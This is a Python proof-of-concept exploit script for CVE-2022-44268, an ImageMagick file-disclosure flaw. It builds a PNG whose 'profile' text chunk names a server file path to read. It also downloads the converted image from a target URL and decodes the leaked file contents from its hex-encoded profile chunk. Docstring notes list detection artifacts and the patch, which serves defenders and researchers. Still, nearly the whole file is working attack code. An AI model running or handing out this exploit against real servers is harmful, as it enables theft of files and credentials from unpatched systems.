CVE-2022-44268.py
import argparse
import requests
import io
from PIL import Image, PngImagePlugin
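def main():
    """Run one of the two modes of this CVE-2022-44268 proof of concept.

    The function reads the module-level ``args`` namespace that the
    ``__main__`` block builds with argparse.

    * ``--url``: download the PNG at that URL and print the hex-encoded
      text stored in its ``Raw profile type`` text chunk.
    * ``--image``: re-save the input image to ``--output`` as a PNG with one
      added text chunk whose keyword is ``profile`` and whose value is
      ``--file-to-read``.
    * neither: print a short banner.

    Defender notes: the artifacts to look for are uploaded PNGs that carry a
    text chunk with the keyword ``profile`` holding a filesystem path, and
    converted images that carry a ``Raw profile type`` chunk. The remedy is
    an ImageMagick release patched for CVE-2022-44268.

    Raises:
        requests.HTTPError: the download returned an error status.
        ValueError: the chunk body is not valid hex, or the decoded bytes
            are not UTF-8 (``UnicodeDecodeError`` is a ``ValueError``).
    """
    if args.url:
        # Send the declared User-Agent so the request is attributable in the
        # target's logs; the original built this dict but never passed it.
        headers = {'User-Agent': 'Shift Security Consulting https://shiftsecurityconsulting.com - CVE-2022-44268'}
        # A timeout keeps the script from hanging on an unresponsive host.
        response = requests.get(args.url, headers=headers, timeout=30)
        response.raise_for_status()
        # NOTE(review): the response body is untrusted input handed straight
        # to the image parser; keep Pillow up to date where this is run.
        img = Image.open(io.BytesIO(response.content))
        # Drop the first three lines of the chunk text and keep the rest.
        # Presumably those are header lines (blank, name, length); confirm
        # against the chunk layout.
        profile_lines = img.info.get('Raw profile type', '').split("\n")[3:]
        hex_payload = "\n".join(profile_lines)
        # The payload is hex-encoded, not encrypted; bytes.fromhex() skips
        # the embedded newlines. A missing chunk yields an empty string.
        decoded_profile = bytes.fromhex(hex_payload).decode('utf-8')
        print(decoded_profile)
    elif args.image:
        img = Image.open(args.image)
        # Attach a single uncompressed text chunk: keyword 'profile', value
        # taken from --file-to-read.
        info = PngImagePlugin.PngInfo()
        info.add_text('profile', args.file_to_read, zip=False)
        # Write the result as PNG to the path given by --output.
        img.save(args.output, 'PNG', pnginfo=info)
    else:
        print('Proof of Concept Exploit for CVE-2022-44268 by Milan Jovic - https://shiftsecurityconsulting.com\nUse -h for help')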
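if __name__ == '__main__':
    # Command-line entry point: build the option namespace that main() reads
    # as the module-level name `args`.
    parser = argparse.ArgumentParser(description='Proof of Concept Exploit for CVE-2022-44268 by Milan Jovic - https://shiftsecurityconsulting.com')
    parser.add_argument('--url', help='The URL of the uploaded PNG image')
    parser.add_argument('--image', help='Input PNG file')
    parser.add_argument('--file-to-read', help='File to read')
    parser.add_argument('--output', help='Output PNG file')
    args = parser.parse_args()
    # argparse always fills in every option key (None when unset), so
    # `not vars(args)` was never true and the help text was never shown.
    # Test the values instead.
    if not any(vars(args).values()):
        parser.print_help()
    main()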